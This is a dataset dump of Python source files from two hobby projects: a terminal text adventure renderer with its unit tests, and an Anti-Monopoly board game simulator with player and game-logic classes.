"text": "import unittest \nimport sys\nimport 
os\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom src.consts import IN_WIDTH\nfrom src.renderer import getRelevantHistoryLines, combineHistoryAndMessage\nfrom src.messages import Message\nfrom test_strings import first_message_no_tabs\n\nclass RendererTest(unittest.TestCase):\n def test_get_corrasponding_lines_with_long_line_history(self):\n line_history = [\"hello\" for _ in xrange(1, 100)]\n message_lines = first_message_no_tabs.split(\"\\n\")\n screen_height = 50\n msg_len = len(message_lines)\n start_position_from_top = 11\n result = getRelevantHistoryLines(line_history, screen_height, msg_len, start_position_from_top)\n self.assertEqual(len(result), len(message_lines) - 1)\n self.assertEqual(result, [\"hello\" for _ in xrange(0, len(message_lines) - 1)])\n\n def test_combine_message_and_history_that_covers_the_screen(self):\n line_history = [str(i) + (\" \" * (IN_WIDTH - len(str(i)))) for i in xrange(1, 100)]\n msg = Message(\"yo\\n\"*29 + \"yo\", \"first\", (50, 11)) \n screen_height = 50\n result = combineHistoryAndMessage(msg.message, 11, line_history, screen_height)\n expectedResult = \"yo\\n\" + ((\" \" * IN_WIDTH) + \"yo\\n\") * 28 + (\" \" * IN_WIDTH) + \"yo\"\n self.assertEqual(result, expectedResult)\n def test_combine_message_and_history_that_intersects(self):\n line_history = [\"hello\" + (IN_WIDTH - len(\"hello\")) * \" \" for _ in xrange(0, 15)]\n msg = Message(\"yo\\n\"*29 + \"yo\", \"first\", (50, 11)) \n screen_height = 50\n result = combineHistoryAndMessage(msg.message, 11, line_history, screen_height)\n expectedResult = \"yo\\n\" + (\"hello\" + \" \" * (IN_WIDTH - len(\"hello\")) + \"yo\\n\") * 4 + (\" \" * IN_WIDTH + \"yo\\n\") * 24 + \" \"*IN_WIDTH + \"yo\"\n self.assertEqual(result, expectedResult)\n def test_combine_message_and_history_that_doesnt_intersect(self):\n line_history = [\"hello\"+ \" \" * 3 for _ in xrange(1, 9)]\n msg = Message(\"yo\\n\"*29 + \"yo\", \"first\", (50, 11)) \n 
screen_height = 50\n result = combineHistoryAndMessage(msg.message, 11, line_history, screen_height)\n expectedResult = \"yo\\n\" + 28* (IN_WIDTH*\" \" + \"yo\\n\") + \" \"*IN_WIDTH + \"yo\"\n self.assertEqual(result, expectedResult) \n def test_combine_delete_message_and_history(self):\n pass\nif __name__ == '__main__':\n unittest.main()" }, { "alpha_fraction": 0.6857234239578247, "alphanum_fraction": 0.690194845199585, "avg_line_length": 39.089744567871094, "blob_id": "e109824f5b83e6c1643807fe0a96e2b871320fd6", "content_id": "d2b52e42c66e9c438fdbcdedf1186bb07f85c6d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3131, "license_type": "no_license", "max_line_length": 164, "num_lines": 78, "path": "/src/renderer.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "import sys\nimport subprocess\nimport itertools\nfrom consts import IN_WIDTH\n\nfillIn = \" \" * IN_WIDTH\n\ndef setTerminalSize(x, y):\n sys.stdout.write(\"\\x1b[8;{rows};{cols}t\".format(rows=y, cols=x))\n\ndef getTerminalSize():\n x = subprocess.check_output(\"tput cols\", shell=True)\n y = subprocess.check_output(\"tput lines\", shell=True)\n return (int(x), int(y))\n\ndef cleanScreen():\n subprocess.call(\"clear\", shell=True)\n subprocess.call(\"printf '\\e[3J'\", shell=True)\n\ndef goto(x, y):\n \"\"\" Moves curser to a position relative to current top of screen \"\"\"\n subprocess.call(\"tput cup %d %d\" % (y, x), shell=True)\n\ndef saveCursorPosition():\n subprocess.call(\"tput sc\", shell=True)\n\ndef restoreCursorPosition():\n subprocess.call(\"tput rc\", shell=True)\ndef echoMessage(message):\n \"\"\" Used for message writing after moving the cursor \"\"\"\n subprocess.call(\"echo '\" + message + \"'\", shell=True)\n\ndef write(message):\n \"\"\" default stdout message \"\"\" \n sys.stdout.write(message)\n\ndef printMessage(message): \n \"\"\" Used for elaborate ASCII messages \"\"\"\n subprocess.call([\"printf 
$'\" + message + \"'\", \"-n\"] , shell=True)\n\ndef printMessageAt(message, location):\n saveCursorPosition()\n goto(location[0],location[1])\n printMessage(message) \n restoreCursorPosition()\n\ndef getRelevantHistoryLines(line_history, scrn_height, msg_len, startY):\n line_history_first_line_pos = len(line_history) - (scrn_height - startY) + 2\n line_history_last_line_pos = line_history_first_line_pos + msg_len - 1\n history_lines_to_add = line_history[line_history_first_line_pos: line_history_last_line_pos]\n return history_lines_to_add\n\ndef historyCoversScreen(line_history, scrn_height):\n return len(line_history) >= scrn_height\n\ndef historyAndMsgIntersect(line_history, startY):\n return len(line_history) > startY\n\ndef combinedMessages(msg_lines, history_lines):\n if len(msg_lines) > len(history_lines):\n return msg_lines[0] + '\\n' + '\\n'.join([line + msg_line for line, msg_line in list(itertools.izip_longest(history_lines, msg_lines[1:], fillvalue=fillIn))])\n else:\n raise ValueError('message length should always be longer than the history lines to combine')\ndef combineHistoryAndMessage(message, starting_line, line_history, scrn_height):\n if historyCoversScreen(line_history, scrn_height):\n msg_len = len(message)\n # Since pressing enter pushes everything a line up in a full screen we deduce it by 1\n starting_line = starting_line - 1\n history_lines_to_add = getRelevantHistoryLines(line_history, scrn_height, msg_len, starting_line)\n if len(history_lines_to_add) != msg_len - 1:\n raise ValueError('message length be 1 less when historyCoversScreen')\n return combinedMessages(message, history_lines_to_add)\n elif historyAndMsgIntersect(line_history, starting_line):\n msg_len = len(message)\n history_lines_to_add = line_history[starting_line + 1: starting_line + msg_len]\n return combinedMessages(message, history_lines_to_add)\n else: \n return combinedMessages(message, [])\n\n\n\n\n" }, { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 
0.7142857313156128, "avg_line_length": 13.5, "blob_id": "6149a1bacd02556cfe25e99e942730490bdc09a2", "content_id": "ffffd63c2602157fe0c2aa9341bef182a8dfbaf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28, "license_type": "no_license", "max_line_length": 14, "num_lines": 2, "path": "/src/consts.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "IN_WIDTH = 70\nTESTING = True" }, { "alpha_fraction": 0.3465067148208618, "alphanum_fraction": 0.35038813948631287, "avg_line_length": 48.71929931640625, "blob_id": "cd2ebb95b064e54dc59364d1507403db2d528665", "content_id": "8ea2ecbf2526a04c4a2d0194a2ebab54ba8fb12f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2834, "license_type": "no_license", "max_line_length": 128, "num_lines": 57, "path": "/src/strings.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport subprocess\nimport os\n\n#### welcome to syshero - a multiplayer game world where you cooperate and compete with others to gain reputation and resources,\n# using unix knowledge. no prior knowledge is required. you will enter the multiplayer world when you reach level 10.\n# to get Started create your character\n# Name:\n#\n# \n#to enter the world press y \n#### use \n#\n\ntotalxp = '80xp to level 2'\nprogressBar = \"[=========================================================-------] 120\"\n# progressBar = \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\nfirst_message_content = \"\"\" \nHey Dan. You don\\\\'t know me, but I need your \nhelp. \nI wish I could tell you more but time is short. \n \n type \\\\'ls\\\\' to see files. use cat to \ndisplay their content.\n\"\"\"\n\nfirst_message_raw = \"\"\" .-----------------------------------------------------------------.\n%-mamamas / .-. Hey Dan. You don\\\\'t know me, but I need your .-. 
\\\\\n%-mamamas| / \\ help. / \\ |\n%-mamamas| |\\_. | I wish I could tell you more but time is short. | /| |\n%-mamamas|\\| | /| |\\ | |/|\n%-mamamas| `---\\\\' | type \\\\'ls\\\\' to see files. use cat to | `---\\\\' |\n%-mamamas| | display their content. | | \n%-mamamas| |-----------------------------------------------------| |\n%-mamamas\\ | | /\n%-mamamas \\ / \\ /\n%-mamamas `---\\\\' `---\\\\'\"\"\"\n\nfirst_message = \"\"\" .-----------------------------------------------------------------.\n / .-. Hey Dan. You don\\\\'t know me, but I need your .-. \\\\\n| / \\ help. / \\ |\n| |\\_. | I wish I could tell you more but time is short. | /| |\n|\\| | /| |\\ | |/|\n| `---\\\\' | type \\\\'ls\\\\' to see files. use cat to | `---\\\\' |\n| | display their content. | | \n| |-----------------------------------------------------| |\n\\ | | /\n \\ / \\ /\n `---\\\\' `---\\\\'\"\"\"\n# first_message = first_message_raw.replace('mamama', '50')\n\n\n\n#### ascii progress bar at the top\n\n## use tput cols and tput lines to render \n## use tput cup x y - see how it works " }, { "alpha_fraction": 0.5933933854103088, "alphanum_fraction": 0.6246246099472046, "avg_line_length": 39.63414764404297, "blob_id": "43faedb6977e957e0c569dbd3a9ca58e87b91439", "content_id": "2955d5e5e555fa562f8bf60404c011e171801235", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1665, "license_type": "no_license", "max_line_length": 82, "num_lines": 41, "path": "/tests/messages_test.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "import unittest \nimport sys\nimport os\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nfrom src.messages import Message\nfrom test_strings import first_message_no_tabs, first_message\n\n\nclass MessagesTest(unittest.TestCase):\n def test_creates_message(self):\n new_message = Message(\"hello\", \"111\", (0,0))\n self.assertEqual(new_message.message, 
[\"hello\"])\n self.assertEqual(new_message.id, \"111\", (0,0))\n def test_creates_message_with_new_lines(self):\n new_message = Message(first_message_no_tabs, \"111\", (50,20))\n self.assertEqual(new_message.message, first_message) \n def test_deletes_message(self):\n new_message = Message(\"hello\", \"111\", (0,0))\n self.assertEqual(new_message.deleteMessage, [\" \"])\n def test_delete_message_with_new_lines(self):\n new_message = Message(\"hello\\n\", \"111\", (0,0))\n self.assertEqual(new_message.deleteMessage, [\" \"])\n def test_delete_message_with_new_lines2(self):\n new_message = Message(\"hel\\n\", \"111\", (0,0))\n self.assertEqual(new_message.deleteMessage, [\" \"]) \n def test_delete_message_with_new_lines_in_middle_of_screen(self):\n new_message = Message(\"hello\\nhiiii\\nyooooo\\n\", \"111\", (51,50))\n self.assertEqual(new_message.deleteMessage, [\" \",\" \",\" \"])\n def test_x_and_Y(self):\n new_message = Message(\"hello\\nhiiii\\nyooooo\\n\", \"111\", (51,50))\n self.assertEqual(new_message.x, 51)\n self.assertEqual(new_message.y, 50) \n def test_create_combined_message(self):\n pass \n\n \n \n\nif __name__ == '__main__':\n unittest.main()" }, { "alpha_fraction": 0.6336314678192139, "alphanum_fraction": 0.6432915925979614, "avg_line_length": 43.380950927734375, "blob_id": "492d4b2293862e62439c09d83004a96230714ffe", "content_id": "c8203dc2d24dc54454d1e8ffe35626247ee40caf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2795, "license_type": "no_license", "max_line_length": 169, "num_lines": 63, "path": "/src/messages.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "import re\nfrom strings import progressBar, first_message, totalxp\nfrom consts import IN_WIDTH\nfrom utils import removeNewLine\nfrom renderer import saveCursorPosition, restoreCursorPosition, historyCoversScreen, goto, printMessage, write, printMessageAt, combineHistoryAndMessage, 
getTerminalSize\n\nclass Message():\n @staticmethod\n def createDeleteMessage(message, x):\n split_message = removeNewLine(message).split(\"\\n\")\n erased_split_message = [re.sub(r'.', \" \", msg) for msg in split_message]\n return erased_split_message\n @staticmethod\n def createMessage(message, x): \n split_message = removeNewLine(message).split(\"\\n\")\n return split_message\n def __init__(self, message, id, startPosition):\n self.id = id\n self.message = self.createMessage(message, startPosition[0])\n self.rawMessage = message\n self.deleteMessage = self.createDeleteMessage(message, startPosition[0])\n self.startPosition = startPosition\n self.x = startPosition[0]\n self.y = startPosition[1]\n def write(self):\n if len(self.message) == 1:\n printMessageAt(self.message[0], self.startPosition)\n printMessageAt(self.message, self.startPosition)\n def erase(self):\n printMessageAt(self.deleteMessage, (self.x, self.y-1) )\n def overlay(self, line_history):\n _ , screen_height = getTerminalSize()\n y = self.y\n if historyCoversScreen(line_history, screen_height):\n y = y-1\n if len(self.message) == 1:\n printMessageAt(self.message[0], (self.x, y)) \n else:\n combinedMessage = combineHistoryAndMessage(self.message, self.y, line_history, screen_height)\n printMessageAt(combinedMessage, (self.x, y))\n def clean(self, line_history):\n _ , screen_height = getTerminalSize()\n y = self.y\n if historyCoversScreen(line_history, screen_height):\n y = y-2\n if len(self.deleteMessage) == 1:\n printMessageAt(self.deleteMessage[0], (self.x, y))\n return\n combinedMessage = combineHistoryAndMessage(self.deleteMessage, y + 1 , line_history, screen_height)\n printMessageAt(combinedMessage, (self.x, y))\n return\n if len(self.deleteMessage) == 1:\n printMessageAt(self.deleteMessage[0], (self.x, y)) \n else:\n combinedMessage = combineHistoryAndMessage(self.deleteMessage, y , line_history, screen_height)\n printMessageAt(combinedMessage, (self.x, y))\n \n\n \n\ntotalxp = 
Message(totalxp, \"xp message\", (IN_WIDTH + 28, 9))\nprogressBar = Message(progressBar, \"prg_bar\", (IN_WIDTH + 2, 10))\nlevel1_firstMessage = Message(first_message, \"lvl1\", (IN_WIDTH + 0, 11))" } ]
10
aboucaud/ramp-workflow
https://github.com/aboucaud/ramp-workflow
ea71a594fd79b0aed1a5259d2abd1d8708dfb9a5
978ad0c3caf105b003fdbbab4631916d1a5d9e46
0d058568c75c7b5ce26cf1ce062f7fa071737870
refs/heads/master
2021-01-13T12:57:44.433199
2017-06-20T12:44:18
2017-06-20T12:44:18
94,901,024
0
0
null
2017-06-20T14:34:46
2017-06-20T14:34:48
2017-06-25T20:48:08
Python
[ { "alpha_fraction": 0.7083333134651184, "alphanum_fraction": 0.7129629850387573, "avg_line_length": 32.230770111083984, "blob_id": "d99429cb8c16a3f20309db24f8cb0b7e3b4fd91f", "content_id": "f849870acb12501df35590b014a79457b4081e05", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 432, "license_type": "permissive", "max_line_length": 67, "num_lines": 13, "path": "/rampwf/score_types/auc.py", "repo_name": "aboucaud/ramp-workflow", "src_encoding": "UTF-8", "text": "from sklearn.metrics import roc_auc_score\n\n\ndef score_function(ground_truths, predictions, valid_indexes=None):\n if valid_indexes is None:\n valid_indexes = slice(None, None, None)\n y_proba = predictions.y_pred[valid_indexes]\n y_true_proba = ground_truths.y_pred_label_index[valid_indexes]\n score = roc_auc_score(y_true_proba, y_proba[:, 1])\n return score\n\n# default display precision in n_digits\nprecision = 2\n" }, { "alpha_fraction": 0.8206896781921387, "alphanum_fraction": 0.8206896781921387, "avg_line_length": 31.22222137451172, "blob_id": "144ae63ddc3f873793136b1b70525c4cc5ba7f4c", "content_id": "bb11a80c98cc731d57a3b94c133c889f093ef597", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "permissive", "max_line_length": 42, "num_lines": 9, "path": "/rampwf/workflows/__init__.py", "repo_name": "aboucaud/ramp-workflow", "src_encoding": "UTF-8", "text": "from . import air_passengers\nfrom . import classifier\nfrom . import clusterer\nfrom . import drug_spectra\nfrom . import feature_extractor\nfrom . import feature_extractor_classifier\nfrom . 
import feature_extractor_regressor\nfrom .regressor import Regressor\nfrom .classifier import Classifier\n" }, { "alpha_fraction": 0.792682945728302, "alphanum_fraction": 0.792682945728302, "avg_line_length": 94.83333587646484, "blob_id": "673aa2787590d1f674bccf4d5e8a113d0a085d0a", "content_id": "7c01ab8e0e47424b2bf7ae152ee167362bd7d0cd", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 574, "license_type": "permissive", "max_line_length": 357, "num_lines": 6, "path": "/README.md", "repo_name": "aboucaud/ramp-workflow", "src_encoding": "UTF-8", "text": "# ramp-workflow\nToolkit for building analytics workflows on the top of pandas and scikit-learn. Primarily intended to feed RAMPs.\n\nWorkflow elements are file names. Most of them are python code files, they should have no extension. They will become editable on RAMP. Other files, e.g. external_data.csv or comments.txt whould have extensions. Editability fill be inferred from extension (e.g., txt is editable, csv is not, only uploadable). File names should contain no more than one '.'.\n\nTests suppose that ramp-kits and ramp-workflows are installed in the same directory." } ]
3
mehmet-sahinoglu/simpetests
https://github.com/mehmet-sahinoglu/simpetests
25a177ce4a89e5069e9a8d7fa47b12340bfce3cf
844bc2026bce7145b1914704336d54a192b66dd1
8ef29e82ca5adf9b33887c6bffaa29a2a8da2b8e
refs/heads/master
2020-03-27T02:37:43.586351
2018-08-23T05:47:32
2018-08-23T05:47:32
145,805,090
0
0
null
2018-08-23T05:32:23
2018-08-23T05:36:40
2018-08-23T05:47:32
Python
[ { "alpha_fraction": 0.5807430148124695, "alphanum_fraction": 0.5898407697677612, "avg_line_length": 29.604650497436523, "blob_id": "6a516e227bef74d6491d43351c886956737faa35", "content_id": "e9700b9e981c6124a35a210b295cd4d32ef90711", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1319, "license_type": "no_license", "max_line_length": 83, "num_lines": 43, "path": "/aircraft.py", "repo_name": "mehmet-sahinoglu/simpetests", "src_encoding": "UTF-8", "text": "class Flight:\n \"\"\" A Flight with a particular passenger aircraft test 2\"\"\"\n\n def __init__(self, number, aircraft):\n if not number[:2].isalpha():\n raise ValueError(\"No airline code in'{}\".format(number))\n\n if not number[:2].isupper():\n raise ValueError(\"Invalid Airline code '{}'\".format(number))\n\n if not (number[2:].isdigit() and int(number[2:]) <= 9999):\n raise ValueError(\"Invalid route number {}\".format(number))\n\n self._number = number\n self._aircraft = aircraft\n\n rows, seats = self._aircraft.seating_plan()\n self._seating = [None] + [{letter: None for letter in seats} for _ in rows]\n\n def number(self):\n return self._number\n\n def airline(self):\n return self._number\n\n def aircraft_model (self):\n return self._aircraft.model()\n\n def _parse_seat(self, seat):\n \"\"\"Parse a seat designator into a valid row and letter.\n\n Args:\n seat: A Seat designator such as 12F\n\n Returns:\n A tuple containing an integer and a string for row and seat\n \"\"\"\n row_numbers, seat_letters= self._aircraft.seating_plan()\n\n letter = seat[-1]\n\n if letter not in seat_letters:\n raise ValueError(\"Invalid seat letter{}\".format(letter))\n\n\n\n" } ]
1
stonek4/anti-monopoly
https://github.com/stonek4/anti-monopoly
ff820d9c3dcb597fe890e5f55b522260d9959bdb
d381d6a483fdb4443b6f3d5fe268398b392171e4
e8ffca257f4e8b64f485eb2d2d3b37709bb0172e
refs/heads/master
2021-01-17T17:17:19.702376
2016-06-02T04:16:02
2016-06-02T04:16:02
60,215,029
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7869520783424377, "alphanum_fraction": 0.7869520783424377, "avg_line_length": 97.0999984741211, "blob_id": "576963b0ba9fcd986167610559879c628c9e5d31", "content_id": "3cee958a225e00ffd452fefb38d5e1b9047f442d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 981, "license_type": "permissive", "max_line_length": 664, "num_lines": 10, "path": "/README.md", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "# Anti-Monopoly Simulation\n\nWhile on vacation, my parents and I picked up a game called Anti-Monopoly, which was clearly a spinoff of the original Monopoly game. The game (found here: http://www.antimonopoly.com/) uses the basic monopoly rules with some twists, the largest being the two types of players (competitors and monopolists). Upon playing the game, my parents and I discovered that the game seems to heavily favor monopolists over competitors, and the game also appeared to take longer than normal monopoly (which already takes a long time) to play. 
The purpose of this simulator is to test different rule sets in order to create a fair rule set that shortens the length of games.\n\n## How to Use\nThe simulator is a python script, that can be run by downloading the files and running:\n\n`$ python main.py`\n\nThere is a lot more that can be configured, and in a while I will update the program with documentation and a config file that will allow for all sorts of madness.\n" }, { "alpha_fraction": 0.5807828903198242, "alphanum_fraction": 0.5829181671142578, "avg_line_length": 27.67346954345703, "blob_id": "6e3bffc77f402e702e390be20f7311b3caaddfe3", "content_id": "9a1ddb24160dcdd2f764380526ce2ff6d4b3925b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1405, "license_type": "permissive", "max_line_length": 83, "num_lines": 49, "path": "/classes/player.py", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "class PLAYER:\n def get_name(self):\n return self.name\n def get_style(self):\n return self.style\n def get_owned(self):\n return self.owned\n def add_prop(self, prop):\n self.owned.append(prop)\n return True\n def get_s_priorities(self):\n return self.s_priorities\n def get_b_priorities(self):\n return self.b_priorities\n def get_tolerance(self):\n return self.tolerance\n def get_budget(self):\n return self.budget\n def set_budget(self, amount):\n self.budget = amount\n return True\n def set_out(self):\n self.owned = []\n self.out = True\n return True\n def check_out(self):\n return self.out\n def set_jailed(self, option):\n self.jailed = option\n self.jail_timer = 2\n return True\n def get_jail_timer(self):\n return self.jail_timer\n def dec_jail_timer(self):\n self.jail_timer -= 1\n return True\n def check_jailed(self):\n return self.jailed\n def __init__(self, name, style, b_priorities, s_priorities, tolerance, budget):\n self.name = name\n self.style = style\n self.owned = []\n self.s_priorities = s_priorities\n 
self.b_priorities = b_priorities\n self.tolerance = tolerance\n self.budget = budget\n self.out = False\n self.jailed = False\n self.jail_timer = 0\n" }, { "alpha_fraction": 0.4865959584712982, "alphanum_fraction": 0.49270880222320557, "avg_line_length": 44.2599983215332, "blob_id": "b546cb9b2e48086ac02945e23feaba58dbc2c97c", "content_id": "164fc8a5c2eca9519d3f607ff8f343cf334feca9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13578, "license_type": "permissive", "max_line_length": 164, "num_lines": 300, "path": "/classes/game.py", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "import time\nimport math\nimport random\nfrom functions import roll\nfrom functions import num_owned\nfrom functions import get_owner\nfrom board import BOARD\nfrom player import PLAYER\n\nclass GAME:\n def print_out(self, text):\n if self.debugging == True:\n print text\n def check_t_bankruptcy(self, player, val):\n outcome = self.check_bal(player, val)\n if outcome == False:\n self.pay(player, player.get_budget())\n player.set_out()\n self.inc_turn()\n for prop in player.get_owned():\n prop.un_mortgage()\n self.print_out(\"Player \"+str(player.get_name())+\" has gone bankrupt to the bank, all properties are freed.\")\n return True\n self.pay(player, val)\n return False\n def check_p_bankruptcy(self, player, val, owner):\n outcome = self.check_bal(player, val)\n if outcome == False:\n self.collect(owner, player.get_budget())\n self.pay(player, player.get_budget())\n for pprop in player.get_owned():\n owner.add_prop(pprop)\n player.set_out()\n self.inc_turn()\n self.print_out(\"Player \"+str(player.get_name())+\" has gone bankrupt to Player \"+str(owner.get_name())+\", all properties were turned over.\")\n return True\n self.pay(player, val)\n self.collect(owner, val)\n return False\n def check_win(self):\n left = 0\n winner = \"\"\n for player in self.players:\n if player.check_out() == False:\n 
left += 1\n winner = player.get_name()\n if left >= 2:\n return False\n self.print_out(\"Player \"+str(winner)+\" wins!!!\")\n return True\n def move(self, player):\n value = roll(2)\n self.print_out(\"Player \"+str(self.turn)+\" rolled \" + str(value))\n self.locations[self.turn] += value\n if (self.locations[self.turn] >= len(self.board)-1):\n self.locations[self.turn] -= len(self.board)-1\n self.collect(player, 100)\n self.print_out(\"Player \"+str(self.turn)+\" moved to \"+self.board[self.locations[self.turn]].get_name())\n def move_to(self, player, prop):\n while True:\n if(self.board[self.locations[self.turn]].get_name() == prop):\n self.print_out(\"Player \"+str(self.turn)+\" moved to \"+self.board[self.locations[self.turn]].get_name())\n return\n else:\n self.locations[self.turn] += 1\n if (self.locations[self.turn] >= len(self.board)-1):\n self.locations[self.turn] -= len(self.board)-1\n self.collect(player, 100)\n def straight(self, player, prop):\n while True:\n if(self.board[self.locations[self.turn]].get_name() == prop):\n player.set_jailed(True)\n self.print_out(\"Player \"+str(self.turn)+\" moved straight to \"+self.board[self.locations[self.turn]].get_name())\n return\n else:\n self.locations[self.turn] += 1\n if (self.locations[self.turn] >= len(self.board)-1):\n self.locations[self.turn] -= len(self.board)-1\n player.set_jailed(True)\n def collect(self, player, value):\n player.set_budget(player.get_budget()+value)\n self.print_out(\"Player \"+str(player.get_name())+\" collected $\"+str(value) + \" | ($\" + str(player.get_budget()) + \")\")\n def pay(self, player, value):\n player.set_budget(player.get_budget()-value)\n self.print_out(\"Player \"+str(player.get_name())+\" paid $\"+str(value) + \" | ($\" + str(player.get_budget()) + \")\")\n return True\n def buy_prop(self, player, prop):\n if player.get_budget >= prop.get_cost():\n self.pay(player, prop.get_cost())\n player.add_prop(prop)\n self.print_out(\"Player \"+str(player.get_name())+\" 
purchased \"+ prop.get_name())\n def sell_houses(self, player, value):\n for pprop in player.get_owned():\n if pprop.get_style() == \"property\":\n while pprop.get_houses() > 0:\n pprop.rem_house()\n self.print_out(\"Player \"+str(player.get_name())+\" sold a house on \"+ pprop.get_name())\n self.collect(player, pprop.get_h_val()/2)\n if player.get_budget >= value:\n return True\n return False\n def buy_houses(self, player):\n for pprop in player.get_owned():\n if pprop.get_style() == \"property\":\n if pprop.get_houses() < 4 or (pprop.get_houses() == 4 and player.get_style() == \"c\"):\n if pprop.check_mortgage() == False and player.get_budget() >= pprop.get_h_val():\n if num_owned(player, pprop) > 1:\n self.pay(player, pprop.get_h_val())\n pprop.add_house()\n self.print_out(\"Player \"+str(player.get_name())+\" bought a house for \"+ pprop.get_name() + \" | ($\" + str(player.get_budget()) + \" rem)\")\n return True\n return False\n def mortgage(self, player, value):\n for pprop in player.get_owned():\n if pprop.get_style() == \"property\" and pprop.check_mortgage() == False:\n if pprop.get_houses() == 0:\n pprop.mortgage()\n self.print_out(\"Player \"+str(player.get_name())+\" mortgaged \"+ pprop.get_name())\n self.collect(player, pprop.get_m_val())\n elif pprop.check_mortgage == False:\n pprop.mortgage()\n self.print_out(\"Player \"+str(player.get_name())+\" mortgaged \"+ pprop.get_name())\n self.collect(player, pprop.get_m_val())\n if player.get_budget() >= value:\n return True\n return False\n def unmortgage(self, player):\n for pprop in player.get_owned():\n if pprop.check_mortgage() == True and pprop.get_um_val() < player.get_budget():\n self.pay(player, pprop.get_um_val())\n pprop.un_mortgage()\n self.print_out(\"Player \"+str(player.get_name())+\" unmortgaged \"+ pprop.get_name())\n return True\n return False\n def check_bal(self, player, val):\n while val > player.get_budget():\n for p in player.get_s_priorities():\n if p == \"h\":\n outcome = 
self.sell_houses(player, val)\n if p == \"m\":\n outcome = self.mortgage(player, val)\n if outcome != True:\n outcome = self.mortgage(player, val)\n if outcome != True:\n return False\n return True\n def inc_turn(self):\n if (self.turn == len(self.players)-1):\n self.turn = 0\n else:\n self.turn += 1\n def take_turn(self):\n player = self.players[self.turn]\n if (player.check_out() == True):\n self.inc_turn()\n return\n if player.check_jailed() == True:\n if player.budget >= 50 and player.get_style() == \"m\":\n self.pay(player, 50)\n player.set_jailed(False)\n self.print_out (\"Player \" + str(self.turn) + \" left jail\")\n else:\n if player.get_jail_timer() > 0:\n first = roll(1)\n second = roll(1)\n self.print_out(\"Player \"+str(self.turn)+\" is in jail and rolled \" + str(first)+ \" \" + str(second))\n if first != second:\n player.dec_jail_timer()\n self.inc_turn()\n return\n player.set_jailed(False)\n self.print_out (\"Player \" + str(self.turn) + \" left jail\")\n self.move(player)\n prop = self.board[self.locations[self.turn]]\n if (prop.get_style() == \"property tax\"):\n outcome = self.check_t_bankruptcy(player, prop.get_value())\n if outcome == True:\n return\n if (prop.get_style() == \"income tax\"):\n total = 0\n for pprop in player.get_owned():\n if pprop.check_mortgage() == False:\n total += pprop.get_cost()\n if pprop.get_style() == \"property\":\n total += pprop.get_houses() * pprop.get_h_val()\n total *= .10\n total += player.get_budget() * .10\n total = int(math.floor(total))\n outcome = self.check_t_bankruptcy(player, prop.get_value(total))\n if outcome == True:\n return\n if (prop.get_style() == \"go to\"):\n self.straight(player, \"sightseeing tour\")\n if (prop.get_style() == \"cm\" or prop.get_style() == \"anti-monopoly foundation\"):\n chance = prop.get_value(player.get_style())\n self.print_out (\"Player \" + str(self.turn) + \" must \" + chance[0] + \" \" + str(chance[1]))\n if (chance[0] == \"move\"):\n self.move_to(player, chance[1])\n 
elif(chance[0] == \"collect\"):\n self.collect(player, chance[1])\n elif(chance[0] == \"pay\"):\n outcome = self.check_t_bankruptcy(player, chance[1])\n if outcome == True:\n return\n elif(chance[0] == \"straight\"):\n self.straight(player, chance[1])\n elif(chance[0] == \"collect_c\"):\n for opp in self.players:\n if opp.get_style() == \"c\" and opp.check_out() == False:\n outcome = self.check_p_bankruptcy(player, chance[1], opp)\n if outcome == True:\n return\n elif(chance[0] == \"collect_m\"):\n for opp in self.players:\n if opp.get_style() == \"m\" and opp.check_out() == False:\n outcome = self.check_p_bankruptcy(player, chance[1], opp)\n if outcome == True:\n return\n can_buy = False\n prop = self.board[self.locations[self.turn]]\n if (prop.get_style() == \"property\" or prop.get_style() == \"utility\" or prop.get_style() == \"transport\"):\n owner_name = get_owner(prop.get_name(), self.players)\n if owner_name >= 0:\n owner = self.players[owner_name]\n if owner_name != self.turn and owner_name >= 0 and prop.check_mortgage() == False and owner.check_jailed() == False:\n val = prop.get_value(owner.get_style(), num_owned(owner, prop))\n outcome = self.check_p_bankruptcy(player, val, owner)\n if outcome == True:\n return\n\n if owner_name < 0:\n can_buy = True\n if player.get_tolerance() <= player.get_budget():\n for p in player.get_b_priorities():\n if p == \"p\":\n if can_buy == True:\n if player.get_budget() > prop.get_cost():\n self.buy_prop(player, prop)\n if p == \"h\":\n buying = True\n while buying == True and player.get_tolerance() <= player.get_budget():\n buying = self.buy_houses(player)\n if p == \"u\":\n unmort = True\n while unmort == True and player.get_tolerance() <= player.get_budget():\n unmort = self.unmortgage(player)\n 